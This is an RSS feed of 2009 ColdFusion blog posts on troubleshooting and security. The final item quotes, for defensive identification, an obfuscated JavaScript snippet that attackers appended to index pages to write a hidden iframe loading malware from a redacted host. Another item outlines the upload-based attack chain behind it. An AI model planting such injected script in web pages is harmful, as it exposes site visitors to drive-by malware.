<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2enclosuresfull.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:media="http://search.yahoo.com/mrss/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0">
			<channel>
			<title>Coldfusion Muse</title>
			<link>http://www.coldfusionmuse.com/index.cfm</link>
			<description>Daily Musings from CFG Mark Kruger</description>
			<language>en-us</language>
			<pubDate>Sun, 12 Jul 2009 07:56:36 -0500</pubDate>
			<lastBuildDate>Mon, 15 Jun 2009 12:30:00 -0500</lastBuildDate>
			<generator>BlogCFC</generator>
			<docs>http://blogs.law.harvard.edu/tech/rss</docs>
			<managingEditor>mkruger@cfwebtools.com</managingEditor>
			<webMaster>mkruger@cfwebtools.com</webMaster>
			
			
			
			
			
			<media:copyright>2006</media:copyright><media:thumbnail url="http://mkruger.cfwebtools.com/images/cfwt_tiny.jpg" /><media:keywords>Coldfusion, cfmx, web server troubleshooting, ms sql, java, web development</media:keywords><media:category scheme="http://www.itunes.com/dtds/podcast-1.0.dtd">Technology/Developers</media:category><itunes:owner><itunes:email>mkruger@cfwebtools.com</itunes:email><itunes:name>Mark A. Kruger</itunes:name></itunes:owner><itunes:author>Mark A. Kruger</itunes:author><itunes:explicit>no</itunes:explicit><itunes:image href="http://mkruger.cfwebtools.com/images/cfwt_tiny.jpg" /><itunes:keywords>Coldfusion, cfmx, web server troubleshooting, ms sql, java, web development</itunes:keywords><itunes:subtitle>Weekly musings on Coldfusion, technology, life and the meaning of it all.</itunes:subtitle><itunes:summary>Weekly musings on Coldfusion, technology, life and the meaning of it all.</itunes:summary><itunes:category text="Technology"><itunes:category text="Developers" /></itunes:category><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="http://feeds.feedburner.com/ColdfusionMuse" type="application/rss+xml" /><item>
				<title>My Funny Val()entine and SQLi</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/6/15/coldfusion.val.sqli</link>
				<description>
				
				&lt;p&gt;
	Regular readers know I'm always on the lookout for interesting issues regarding SQL Injection and ColdFusion. This year has been a banner year for injection on ColdFusion sites and if you are not on the Cfqueryparam bandwagon yet I have one more example of code that might &lt;em&gt;seem&lt;/em&gt; to be inoculated but is not. It has to do with the use of val()...
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>ColdFusion</category>
				
				<category>Coldfusion Security</category>
				
				<pubDate>Mon, 15 Jun 2009 12:30:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/6/15/coldfusion.val.sqli</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Ask-a-Muse: How Do I Upgrade the JVM?</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/6/11/upgrade.ColdFusion.JVM</link>
				<description>
				
				&lt;div style="margin-left: 20px; border-left: 3px solid #CCCCCC; padding-left: 4px;"&gt;

&lt;p&gt;&lt;em&gt;Muse Reader Rob Asks:&lt;/em&gt;&lt;br&gt;	
	I have a silly question. How exactly &lt;em&gt;do&lt;/em&gt; you upgrade the JVM on your ColdFusion server?  My server is on Win2k3 x64 and the JVM version is 1.6.0_04.  Do you specify it manually in the jvm.config file? 
&lt;/p&gt;
&lt;/div&gt;
&lt;p style="padding-top: 15px;"&gt;
	I'm glad you asked this question because it reminds me that I sometimes give advice without any follow through - which is the same problem I have with my 8 iron. Upgrading the JVM on a windows installation is pretty easy. Just remember that you will need the correct Java Runtime for your platform and ColdFusion version. Rob specified Win2k3 x64 so I assume he means he is running ColdFusion 8 enterprise 64 bit - in which case the target version is 1.6 update 14 (or 1.6.0_14).  I usually start at the Sun Java &lt;a href="http://java.sun.com/javase/downloads/index.jsp"&gt;download&lt;/a&gt; page. Once you have the right version in hand the rest is easy.
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>ColdFusion</category>
				
				<category>Coldfusion Troubleshooting</category>
				
				<pubDate>Thu, 11 Jun 2009 12:41:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/6/11/upgrade.ColdFusion.JVM</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Certain JPGs Can Crash Your ColdFusion 8 Server</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/6/10/javax.imageio.jpg.crash.jvm</link>
				<description>
				
				&lt;p&gt;
	This issue was brought to my attention by Adrian Lynch on &lt;a href="http://www.houseoffusion.com"&gt;CF-Talk&lt;/a&gt;. It seems that if you use the new image functions in ColdFusion 8 against certain kinds of JPG images you can actually cause your JVM to crash. If you have code that uses the latest image functions to handle uploaded images you should definitely take note of this post. I cannot yet see how a user might take advantage of this bug to penetrate your server, but a malicious (or even non-malicious) user could easily perform a denial of service attack and cause your CF server to go up and down like Jack LaLanne doing jumping jacks. So if you fit into that category (handling uploaded images using CF 8 image functionality) here's the scoop.
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>ColdFusion</category>
				
				<category>Coldfusion Troubleshooting</category>
				
				<pubDate>Wed, 10 Jun 2009 09:41:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/6/10/javax.imageio.jpg.crash.jvm</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Connector Problems - Win2k8, IIS7 and Multi-Server ColdFusion 8 x 64 Bit</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/6/9/IIS7.Connector.Problem</link>
				<description>
				
				&lt;p&gt;
I have not yet had this problem specifically, but it was pointed out by CFG Tom Forrest who spent some time wrangling with it. He was trying to use the connector widget to connect IIS 7 sites to ColdFusion instances (running in Multi-Server Mode). He reports as follows:
&lt;/p&gt;

&lt;div style="margin-left: 20px; border-left: 3px solid #CCCCCC; padding-left: 4px;"&gt;

&lt;p&gt;
The connector refused to install anything into IIS.  When I started it, the first window would appear.  When I clicked "add" I would see something to the effect of, &lt;em&gt;Installing required IIS7 components.  It may take 2 to 5 minutes to complete.&lt;/em&gt; The window that allows you to set all the parameters would open, and you could select any of your running CF servers.  However, you couldn't select any of the IIS sites that were created. Assuming you give up and click ok, allowing it to "install to all" you would get an error window stating &lt;em&gt;error creating IIS application extensions ColdFusion&lt;/em&gt;.
&lt;/p&gt;
&lt;/div&gt;
&lt;p&gt;
	According to Tom the fix is to install the IIS 6 Management Compatibility role service. This service allows an IIS 7 server to "act like" an IIS 6 server. Once installed the configuration tool began to work. 
&lt;/p&gt;
&lt;p&gt;
	While I haven't had this specific problem, I have noticed that a number of other things are easier and more familiar with the IIS Management Compatibility installed. Thanks Tom.
&lt;/p&gt;
				
				
				</description>
				
				<category>ColdFusion</category>
				
				<category>Coldfusion Troubleshooting</category>
				
				<pubDate>Tue, 09 Jun 2009 16:09:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/6/9/IIS7.Connector.Problem</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Ask-a-Muse: Killing the Immortal Thread</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/6/9/killing.threads</link>
				<description>
				
				&lt;div style="margin-left: 20px; border-left: 3px solid #CCCCCC; padding-left: 4px;"&gt;
&lt;p&gt;&lt;em&gt;Muse Reader Joe Asks:&lt;/em&gt;&lt;br&gt;	
	How do I kill a request? Every other day or so there will be a runaway process that cannot be killed. Clicking on the red exclamation in the monitoring tool does not give an error but it does not kill the request either. My question is how to kill this process? 
&lt;/p&gt;
&lt;/div&gt;
&lt;p style="padding-top: 15px;"&gt;
	Ah, the immortal thread - like a god coming down from Mt. Olympus and laughing with his (or her) hands on his mighty hips (see why I chose "his"? ... "her mighty hips" ... well, I just didn't want to go there). Such threads are mind-bogglingly frustrating. In actual fact, there are some requests spawned by ColdFusion that &lt;em&gt;may not be able to be terminated&lt;/em&gt; by ColdFusion. For the long version read on, McDuff.
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>ColdFusion</category>
				
				<category>Coldfusion Troubleshooting</category>
				
				<pubDate>Tue, 09 Jun 2009 09:18:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/6/9/killing.threads</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Google Wave - The Next Thing?</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/6/3/google.wave</link>
				<description>
				
				&lt;p&gt;
	Like most geeks I love technology. I'm always reading about the cutting edge of research. I can become as engrossed in an online white paper about nano-technology as I am in my favorite TV show - which is a toss-up between the gritty AMC drama &lt;a href="http://www.amctv.com/originals/breakingbad/"&gt;Breaking Bad&lt;/a&gt; and the light-hearted and endearing (although occasionally gruesome) &lt;a href="http://abc.go.com/primetime/pushingdaisies/index"&gt;Pushing Daisies&lt;/a&gt; with the irrepressible Kristin Chenoweth as former jockey-turned-waitress Olive Snook. Who else could make unrequited love seem so appealing and delicious... but I digress. This "forward leaning" interest in technology tends to create a momentum for me and even for my company (&lt;a href="http://www.cfwebtools.com"&gt;CF Webtools&lt;/a&gt;) that makes me prone to try new things. So when Google announces a ground-breaking new paradigm for collaboration my temptation is to say "count me in". In case you missed the hype I'm talking about &lt;a href="http://code.google.com/apis/wave/"&gt;Google Wave&lt;/a&gt; which was previewed at Google I/O. 
&lt;/p&gt;
&lt;p&gt;
	Google Wave aims to combine elements of email, chat, blogging, micro-blogging, collaboration, source control, and social networking into a single interface that claims to draw in all the best features of these tools while eliminating some of the annoying drawbacks. The paradigm for Google Wave moves away from "messages" and toward a "conversation". That might seem too abstract to matter, but such idioms are important because they give us an anchor - a point of reference for understanding something new. 
&lt;/p&gt;
&lt;p&gt;
	Let me say at the outset that I'm &lt;em&gt;positively&lt;/em&gt; inclined toward this product (at least, what I've seen of it). I can see how it would benefit my own team in many ways. I'm already thinking of how I might enhance our vast, custom tracking system using the Wave Protocol. One of the best things about Wave is the protocol layer and integration strategy. So I am not against the product - indeed I'm rooting for it. I would love to get rid of our hodgepodge of tools in favor of one elegant way of collaborating. Still, I see some problems for Wave on the horizon. So if you want the contrarian view read on...
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>Humor and Life</category>
				
				<pubDate>Wed, 03 Jun 2009 11:49:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/6/3/google.wave</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Fun With Qw...Uh...Acme Communications</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/5/15/fun.with.phone.company</link>
				<description>
				
				&lt;p&gt;
 Muse readers and friends who know me well understand that I'd rather have my nether regions bitten by a Laplander than deal with sales people over the phone. However, as a (usually) caring person, I try not to let my personal ire show too forcefully when one of these hard-working sales folks calls. I know they are just doing their job. Recently however, one phone company has caused me to rethink my "no throttling the sales person" position. I won't say their name but it begins with a Q and ends with est - and in a twist it does not have a U in it. I guess these folks don't know how to spell NO either because they keep calling.
&lt;/p&gt;
&lt;p&gt;
	Usually it is pretty typical stuff like "are you happy with your phone service". I'm actually &lt;em&gt;not&lt;/em&gt; happy with my phone service but I prefer not to discuss it with strangers over the phone. Still, I'm usually pretty nice and say something like "we are not ready to make a change right now." The last 2 times, however, the salesman has chosen a new tack. They are now trying to wheedle additional proprietary information out of me. Today things did not go so well....
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>Humor and Life</category>
				
				<pubDate>Fri, 15 May 2009 11:20:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/5/15/fun.with.phone.company</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Cfinclude for Good or Evil</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/5/14/cfinclude.arbitrary.file.extensions</link>
				<description>
				
				&lt;p&gt;
	Yesterday I was doing some searches on a sick server to troubleshoot the &lt;a href="http://www.coldfusionmuse.com/index.cfm/2009/4/23/Iframe.VBscript"&gt;Iframe Injection&lt;/a&gt; issue. A user had posted some additional information regarding a file that appeared on his server that had this issue. The file was named "fection.cfm" so we now know the hacker casually removes his prefixes (or I should say 'emoves his 'efixes). I began my search by looking for the file specifically, then moved on to look for the string "cfexecute" in all of the *.cfm files. But that got me thinking. A clever hacker might know some things about ColdFusion. He could, in fact, further obscure his code with some knowledge of cfinclude and IIS. Such a technique can be used to secure your code as well. You can create code that is only runnable by ColdFusion using cfinclude. Here's the skinny.
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>ColdFusion</category>
				
				<category>Coldfusion Security</category>
				
				<pubDate>Thu, 14 May 2009 09:23:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/5/14/cfinclude.arbitrary.file.extensions</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Help an Aspiring Animator</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/4/29/corey.animation</link>
				<description>
				
				&lt;p&gt;
	My nephew is 16 or 17 and wants to become an animation/game programmer. He's been working using a product called &lt;a href="http://www.blender.org/"&gt;Blender&lt;/a&gt;. It seems to be pretty polished for an open source project. I was impressed with the movie galleries on the site and especially with "Big Buck Bunny" and "Elephants Dream" - pretty awesome CGI stuff. Most of you who read my blog know that I am &lt;em&gt;not&lt;/em&gt; qualified to do (or judge) anything artistic. My wife won't even let me choose which soap to put in the shower. So I thought I would be a good uncle and ask my readers if they have a take on Blender. Is it "up to snuff" for an IDE? Is there something more powerful or better he should be using (and why)? 
&lt;/p&gt;
&lt;p&gt;
	He gave me an animation which I have converted to FLV. You can check it out at this &lt;a href="Javascript:openBr('/corey/corey-robo.html','CoreyRobo','width=550,height=450,scrollbars=no,resizable=yes')"&gt;link&lt;/a&gt;. Take a look and see what you think. I think he has talent. It needs audio, but it's pretty smooth and he's thought of a number of things - backlighting, reflections and shadows etc. What I &lt;em&gt;don't&lt;/em&gt; know is if it's "out of the box" thinking or the result of working his way through tutorials. I would appreciate any comments you can muster, but please be helpful and not too critical (remember when you were just starting out :). If you have a comment you want to send without posting it "live" feel free to use the ask-a-muse box in the upper right or email me directly at mkruger at cfwebtools.com. 
&lt;/p&gt;
				
				
				</description>
				
				<category>Design</category>
				
				<pubDate>Wed, 29 Apr 2009 10:04:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/4/29/corey.animation</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Passing an Array to a .NET Webservice</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/4/27/array.CF.to.NET</link>
				<description>
				
				&lt;p&gt;
	Here's a problem that will leave you scratching your head should you ever run into it. Consider a simple .NET web service that requires an "array of strings". The goal was to make use of a web service API published by &lt;a href="http://www.smartertools.com"&gt;Smarter Mail&lt;/a&gt;. I wanted a programmatic way of adding email aliases - groups of emails that function under a single address. The web service methods provided by the smarter mail API could not be simpler. Each request requires a username, password, domain and then additional stuff to make it work. For example, the "GetAlias()" function allowed me to pass in a domain and alias and get a list of emails already associated with that alias.
&lt;/p&gt;
&lt;p&gt;
	The problem came when it was time to add or update an alias. The argument for "addresses" to pass to the .NET service looked like "an array of strings" (that's how the help docs referred to it as well). The node in the XML looked pretty simple:
&lt;/p&gt;
&lt;code&gt;
&lt;AddAlias xmlns="http://tempuri.org/"&gt;
  &lt;AuthUserName&gt;string&lt;/AuthUserName&gt;
  &lt;AuthPassword&gt;string&lt;/AuthPassword&gt;
  &lt;DomainName&gt;string&lt;/DomainName&gt;
  &lt;AliasName&gt;string&lt;/AliasName&gt;
  &lt;Addresses&gt;
    &lt;string&gt;string&lt;/string&gt;
    &lt;string&gt;string&lt;/string&gt;
  &lt;/Addresses&gt;
&lt;/AddAlias&gt;
&lt;/code&gt;
&lt;p&gt;
Now I can think of several ways to create an array of strings in ColdFusion so I started giving it the old college try. Unfortunately each attempt ended in failure. I could not figure out how to get a data type instantiated in CF to match the data type that .NET expected. I ended up experimenting with several different approaches to the array syntax.
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>ColdFusion</category>
				
				<pubDate>Mon, 27 Apr 2009 21:09:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/4/27/array.CF.to.NET</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>The Inquisitive Mind</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/4/27/inquisitive.mind</link>
				<description>
				
				&lt;p&gt;
	A misconception about technical folks is that they are fully left-brained and incapable of true creativity. Anyone on the inner circle of geekdom knows this is not the case, but folks on the outside looking in often only see the engineering skills - attention to detail and minutiae, obsession with systems and process, and a penchant for pocket protectors. Of course in the last 10 years you can add flip-flops, body piercings and a sort of pidgin English consisting of acronyms, techno-babble and quips from Monty Python and the Princess Bride. That should tell you something in itself. There's more to IT folks than numbers and obscure discussions about the best Star Trek movie (Khaaaan!!!!). That got me thinking.
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>Project Management</category>
				
				<category>Humor and Life</category>
				
				<pubDate>Mon, 27 Apr 2009 11:32:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/4/27/inquisitive.mind</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>VB Script For Iframe Injection Attack</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/4/23/Iframe.VBscript</link>
				<description>
				
				&lt;p&gt;
Thanks to Nate from &lt;a href="http://www.houseoffusion.com"&gt;CF-Talk&lt;/a&gt; I have a copy of the malicious VBS script that is doing the damage. If you are being victimized by this attack and you need to see the script for whatever purpose, let me know and I will make sure you get a copy. I know it goes without saying, but just don't run it :).
&lt;/p&gt;
&lt;p&gt;
 Meanwhile there is some consensus, given the root access of this code, that an infected server cannot be trusted even after a thorough cleaning. Dave Watts and Tom Chiverton both gave such advice. While it's not always possible and it's a huge hassle, it might be the best solution to bite the bullet and do it.
&lt;/p&gt;
				
				
				</description>
				
				<category>ColdFusion</category>
				
				<category>Security</category>
				
				<pubDate>Thu, 23 Apr 2009 11:14:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/4/23/Iframe.VBscript</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Iframe Injection Follow Up</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/4/21/Iframe.Followup.IIS.Config</link>
				<description>
				
				&lt;p&gt;
	For those of you who have been following the Iframe injection attack saga (see &lt;a href="http://www.coldfusionmuse.com/index.cfm/2009/4/16/iframe.insertion.hack"&gt;Iframe Insertion on Index.* Home pages&lt;/a&gt;) I have an update. I would like to thank one of my readers named Kumar for referring me to &lt;a href="http://www.blackhat.com/presentations/bh-dc-09/ValSmith/BlackHat-DC-09-valsmith-colin-Dissecting-Web-Attacks.pdf"&gt;this excellent article&lt;/a&gt; (a PDF file) on Black Hat. The article seems to pinpoint the origin and nature of the attack. The document describes an attack in depth with multiple steps (just as we had speculated). The first step was an SQLi attempt. But failing that the attacker compromised the server in a rather ingenious fashion.
&lt;/p&gt;
&lt;ul&gt;
	&lt;li&gt;Using an image upload capability he uploaded a file to the server that "looked" like an image but was not.&lt;/li&gt;
	&lt;li&gt;The file (containing executable code) was then hit with GET and POST requests.&lt;/li&gt;
	&lt;li&gt;The payload of the GET and POST requests was able to set up scheduled tasks to append the JS code to "index.*" files on a timed basis.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
	The file that was uploaded was a CDX file. On a properly configured IIS server this attack would fail. Here's why.
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>ColdFusion</category>
				
				<category>Security</category>
				
				<pubDate>Tue, 21 Apr 2009 09:29:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/4/21/Iframe.Followup.IIS.Config</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Review: Foundeo Web Application Firewall</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/4/17/foundeo.WAF</link>
				<description>
				
				&lt;p&gt;
	Coldfusion Guru and all around super geek &lt;a href="http://www.petefreitag.com/"&gt;Pete Freitag&lt;/a&gt; was nice enough to let me check out his new "Web Application Firewall" (see &lt;a href="http://foundeo.com/security/"&gt;this link&lt;/a&gt; for more info). This product serves as a Coldfusion based security filter for all requests coming to an application. I was impressed with the approach Pete takes. After the Init the code ran smoothly and did not appreciably increase my page load time (always a concern when you are "wrapping" your application in something). If you use Pete's system you will pretty much guarantee that your site will be protected from a high percentage of known attacks. Overall I give the application an A for innovation and organization, a B+ for installation and a C- on the price. If you want to know more read on.
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>ColdFusion</category>
				
				<category>Product Reviews</category>
				
				<pubDate>Fri, 17 Apr 2009 17:44:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/4/17/foundeo.WAF</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Iframe Insertion on Index.* Home pages</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/4/16/iframe.insertion.hack</link>
				<description>
				
				&lt;p&gt;
There's a hack that's beginning to be active that targets pages named "index.*". Actually it sounds rather like an old hack that is resurfacing. Since many ColdFusion sites use this convention for the home page this attack tends to hit quite a few ColdFusion sites that are vulnerable. The attack appends a script like this one to the bottom of each "index.*" page:
&lt;code&gt;
&lt;sc ript&gt; 
var applstrna0 = " ; 
var applstrna1 = "rame src=http://***Domain Host Name****"; 
var applstrna2 = ".com/bb/faq.htm"; 
var applstrna3 = " width=100 height=0&gt; ; 
var applstrna4 = "frame&gt;"; 
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4); 
&lt;/script&gt; 
&lt;/code&gt;

Please note that I have not included the actual url of this attack. The domain includes the string "said7". I am only making sure I mention said7 so that folks searching for info on this attack can find this specific post and possibly be helped. I have no wish to benefit the said7 effort and I hope they all get dysentery and spend the weekend in the latrine.
&lt;/p&gt;
&lt;p&gt;
 As you can see the script itself is pretty simple. It writes out an invisible Iframe to the bottom of the page. The target of the Iframe attempts to download a trojan or malware to the user's machine. This attack is insidious and I have yet to discover the origin. But I do know a few things about it - and how to prevent it from continuing. One important thing to note: if you have this problem and Google indexes your sites and sees these pages, they will flag your site. Browsers like Firefox use the Google service to throw up a big "malware" warning. &lt;/p&gt;
&lt;p&gt;
The following article details the attack and the notes I've gathered about it. Some day soon I hope to post a more definitive who, what, when and why post about it. To gather the following notes I'm indebted to the folks on the CF-Talk List (&lt;a href="http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164"&gt;this thread&lt;/a&gt;), Nathan, Nick, Jason, Scott, Don and probably a few others I am forgetting. I can't give away too much info here - but please accept my thanks.
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>Hosting and Networking</category>
				
				<category>Security</category>
				
				<pubDate>Thu, 16 Apr 2009 14:18:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/4/16/iframe.insertion.hack</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			<copyright>2006</copyright><media:credit role="author">Mark A. Kruger</media:credit><media:rating>nonadult</media:rating></channel></rss>
